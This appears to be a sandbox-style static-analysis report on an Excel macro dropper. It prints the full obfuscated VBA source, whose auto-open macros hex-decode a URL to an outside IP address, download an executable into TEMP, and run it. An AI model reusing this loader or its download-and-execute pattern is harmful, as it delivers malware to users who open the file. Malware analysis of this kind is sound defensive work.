Xls.Dropper.Agent-7623200-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 a537774596d7ac16…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 46.5 KB
Created: 1996-10-08 23:32:33
Authoring application: Microsoft Excel
First seen: 2015-02-05
MD5: 3cc59cb545020d0d44c8ec9e7e04dc25
SHA-1: 1a8f8aa0fad3be7faeffc9fab741bd1f727f6290
SHA-256: a537774596d7ac16ca41e6f468c76c807747279de12ccb28b489322aee0b92df
Risk score: 386

Malware Insights

Xls.Dropper.Agent-7623200-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1071.001 Web Protocols

The file contains obfuscated VBA macros that use the URLDownloadToFile API to fetch a second-stage payload. The presence of AutoOpen and Workbook_Open auto-execution macros, together with critical heuristic firings for shell execution and URL downloading, strongly indicates dropper functionality. The ClamAV detection name further supports this classification.

Heuristics (11)

  • ClamAV: Xls.Dropper.Agent-7623200-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Agent-7623200-0
  • Reference to URLDownloadToFile API [critical] (SC_STR_URLDOWNLOAD)
  • VBA macros detected [medium] (OLE_VBA_MACROS, 7 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Matched line in script:
        pHUdsfd = Shell(oGYUIgiu, 1)
  • URLDownloadToFile in VBA [critical] (OLE_VBA_DOWNLOAD)
    Matched line in script:
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        pHUdsfd = Shell(oGYUIgiu, 1)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] (OLE_VBA_WBOPEN)
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Matched line in script:
        oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7762 bytes
SHA-256: fceeccbdc374a3d6952d2b0b71e4eaa31b3ae2ebaa09091990035a7440a5935d
Detection: ClamAV: No threats found
Obfuscation or payload: likely (65 of 113 identifiers look randomly generated, e.g. 'UJeTKZjRRErSpBP', consistent with name-mangling obfuscation)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As LongPtr, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As LongPtr) As LongPtr
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As Long, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As Long) As Long
#End If


Sub werwehytef()
Dim QOBXhmAl As Integer
For QOBXhmAl = 0 To 3
Dim kXJALATO As Integer
For kXJALATO = 0 To 5
Dim DwptkYLg As Integer
For DwptkYLg = 0 To 9
DoEvents
Next DwptkYLg
DoEvents
Next kXJALATO
Dim tlwoFgep As Integer
For tlwoFgep = 0 To 3
DoEvents
Next tlwoFgep
DoEvents
Next QOBXhmAl
Dim vtRZaliF As Integer
For vtRZaliF = 0 To 6
Dim pHKvosSI As Integer
For pHKvosSI = 0 To 4
DoEvents
Next pHKvosSI
DoEvents
Next vtRZaliF
Dim flWdzivJ As Integer
For flWdzivJ = 0 To 7
DoEvents
Next flWdzivJ
sdfsdwee
End Sub
Sub AutoOpen()
Dim VpUsliln As Integer
For VpUsliln = 0 To 2
Dim SAYlUiXp As Integer
For SAYlUiXp = 0 To 6
Dim XlKwlndr As Integer
For XlKwlndr = 0 To 5
DoEvents
Next XlKwlndr
DoEvents
Next SAYlUiXp
Dim NWWpsxNd As Integer
For NWWpsxNd = 0 To 8
DoEvents
Next NWWpsxNd
DoEvents
Next VpUsliln
Dim HrOinrOl As Integer
For HrOinrOl = 0 To 6
Dim MRKwlEzM As Integer
For MRKwlEzM = 0 To 7
DoEvents
Next MRKwlEzM
DoEvents
Next HrOinrOl
Dim VuWpsbFr As Integer
For VuWpsbFr = 0 To 8
DoEvents
Next VuWpsbFr
    werwehytef
End Sub
Sub Workbook_Open()
Dim fkNGSJaZ As Integer
For fkNGSJaZ = 0 To 1
Dim vofHhwnj As Integer
For vofHhwnj = 0 To 6
Dim WZzOiENz As Integer
For WZzOiENz = 0 To 1
DoEvents
Next WZzOiENz
DoEvents
Next vofHhwnj
Dim UedLuKbT As Integer
For UedLuKbT = 0 To 8
DoEvents
Next UedLuKbT
DoEvents
Next fkNGSJaZ
Dim vrUjKxcT As Integer
For vrUjKxcT = 0 To 6
Dim fkaGOdrn As Integer
For fkaGOdrn = 0 To 5
DoEvents
Next fkaGOdrn
DoEvents
Next vrUjKxcT
Dim itRnfloL As Integer
For itRnfloL = 0 To 3
DoEvents
Next itRnfloL
    werwehytef
End Sub
Sub sdfsdwee()
Dim nKOyHRKO As Integer
For nKOyHRKO = 0 To 7
Dim fjaGYIub As Integer
For fjaGYIub = 0 To 1
Dim DcXpaUZB As Integer
For DcXpaUZB = 0 To 3
DoEvents
Next DcXpaUZB
DoEvents
Next fjaGYIub
Dim nVumNXzZ As Integer
For nVumNXzZ = 0 To 1
DoEvents
Next nVumNXzZ
DoEvents
Next nKOyHRKO
Dim kLrEvRLI As Integer
For kLrEvRLI = 0 To 2
Dim KJSNNToS As Integer
For KJSNNToS = 0 To 7
DoEvents
Next KJSNNToS
DoEvents
Next kLrEvRLI
Dim SRhPEQft As Integer
For SRhPEQft = 0 To 5
DoEvents
Next SRhPEQft
HBBJK = BUHVugrue("6874")
hkhnioki = BUHVugrue("74703A2F2F")
hojdsfg = BUHVugrue("3133362E3234332E3233372E3230343A383038302F6D6F7073692F706F7073692E706870")
    uyVUHjdg = HBBJK + hkhnioki + hojdsfg
Dim lGxtiFPa As Integer
For lGxtiFPa = 0 To 2
Dim eEwdmMHl As Integer
For eEwdmMHl = 0 To 5
Dim QYosYDRG As Integer
For QYosYDRG = 0 To 2
DoEvents
Next QYosYDRG
DoEvents
Next eEwdmMHl
Dim vulxTzrl As Integer
For vulxTzrl = 0 To 9
DoEvents
Next vulxTzrl
DoEvents
Next lGxtiFPa
Dim uyvadHZZ As Integer
For uyvadHZZ = 0 To 6
Dim MYIgMYac As Integer
For MYIgMYac = 0 To 1
DoEvents
Next MYIgMYac
DoEvents
Next uyvadHZZ
Dim lSPogoeg As Integer
For lSPogoeg = 0 To 6
DoEvents
Next lSPogoeg
    oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
Dim AFzUlTGV As Integer
For AFzUlTGV = 0 To 9
Dim ysVaDJCV As Integer
For ysVaDJCV = 0 To 7
Dim lFAFtXdl As Integer
For lFAFtXdl = 0 To 2
DoEvents
Next lFAFtXdl
DoEvents
Next ysVaDJCV
Dim UtrTsIYm As Integer
For UtrTsIYm = 0 To 5
DoEvents
Next UtrTsIYm
DoEvents
Next AFzUlTGV
Dim NBASjVzj As Integer
For NBASjVzj = 0 To 8
Dim eRlvndEb As Integer
For eRlvndEb = 0 To 6
DoEvents
Next eRlvndEb
DoEvents
Next NBASjVzj
Dim kWWhUBVb As Integer
For kWWhUBVb = 0 To 9
DoEvents
Next kWWhUBVb
    eUUsdgf = URLDownloadToFile(0&, uyVUHjdg, oGYUIgiu, 0&, 0&)
   Dim pHUdsfd
Dim mAYkCQMj As Integer
For mAYkCQMj = 0 To 8
Dim TfgSUebU As Integer
For TfgSUebU = 0 To 4
Dim lIaKjaFk As Integer
For lIaKjaFk = 0 To 2
DoEvents
Next lIaKjaFk
DoEvents
Next TfgSUebU
Dim IBADqvaD As Integer
For IBADqvaD = 0 To 5
DoEvents
Next IBADqvaD
DoEvents
Next mAYkCQMj
Dim lFbXYkVq As Integer
For lFbXYkVq = 0 To 2
Dim bzGSzOfn As Integer
For bzGSzOfn = 0 To 3
DoEvents
Next bzGSzOfn
DoEvents
Next lFbXYkVq
Dim zFnLDitd As Integer
For zFnLDitd = 0 To 6
DoEvents
Next zFnLDitd
    pHUdsfd = Shell(oGYUIgiu, 1)

End Sub


Public Function BUHVugrue(ByVal UJeTKZjRRErSpBP As String) As String
For GAqVffe = 1 To Len(UJeTKZjRRErSpBP) Step 2
Dim GCYINvKW As Integer
For GCYINvKW = 0 To 9
Dim GBcmygBP As Integer
For GBcmygBP = 0 To 4
Dim VBWAuLfD As Integer
For VBWAuLfD = 0 To 7
DoEvents
Next VBWAuLfD
DoEvents
Next GBcmygBP
Dim hXiYEAvI As Integer
For hXiYEAvI = 0 To 2
DoEvents
Next hXiYEAvI
DoEvents
Next GCYINvKW
Dim XupwfuAF As Integer
For XupwfuAF = 0 To 5
Dim nUCwEhDX As Integer
For nUCwEhDX = 0 To 3
DoEvents
Next nUCwEhDX
DoEvents
Next XupwfuAF
Dim RpNpxsby As Integer
For RpNpxsby = 0 To 4
DoEvents
Next RpNpxsby
OAEeSPJcZw = Chr(CDbl(Chr(38) & Chr(72) & Mid$(UJeTKZjRRErSpBP, GAqVffe, 2)))
Dim DuDiCbga As Integer
For DuDiCbga = 0 To 6
Dim KYaocdyh As Integer
For KYaocdyh = 0 To 1
Dim WdSgkWrx As Integer
For WdSgkWrx = 0 To 1
DoEvents
Next WdSgkWrx
DoEvents
Next KYaocdyh
Dim OSNdzeBF As Integer
For OSNdzeBF = 0 To 8
DoEvents
Next OSNdzeBF
DoEvents
Next DuDiCbga
Dim pRddMWhq As Integer
For pRddMWhq = 0 To 2
Dim MxHzzJfz As Integer
For MxHzzJfz = 0 To 1
DoEvents
Next MxHzzJfz
DoEvents
Next pRddMWhq
Dim UVNdayDT As Integer
For UVNdayDT = 0 To 1
DoEvents
Next UVNdayDT
qwsEHVrtCMHkAS = qwsEHVrtCMHkAS & OAEeSPJcZw
Next GAqVffe
Dim JOHXGwzq As Integer
For JOHXGwzq = 0 To 6
Dim iMLSjCiD As Integer
For iMLSjCiD = 0 To 6
Dim ToNdaoAx As Integer
For ToNdaoAx = 0 To 8
DoEvents
Next ToNdaoAx
DoEvents
Next iMLSjCiD
Dim vCRVRgYG As Integer
For vCRVRgYG = 0 To 6
DoEvents
Next vCRVRgYG
DoEvents
Next JOHXGwzq
Dim iGddLVrz As Integer
For iGddLVrz = 0 To 6
Dim tqkMiOqQ As Integer
For tqkMiOqQ = 0 To 3
DoEvents
Next tqkMiOqQ
DoEvents
Next iGddLVrz
Dim JQZruVPf As Integer
For JQZruVPf = 0 To 1
DoEvents
Next JQZruVPf
BUHVugrue = qwsEHVrtCMHkAS
End Function

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True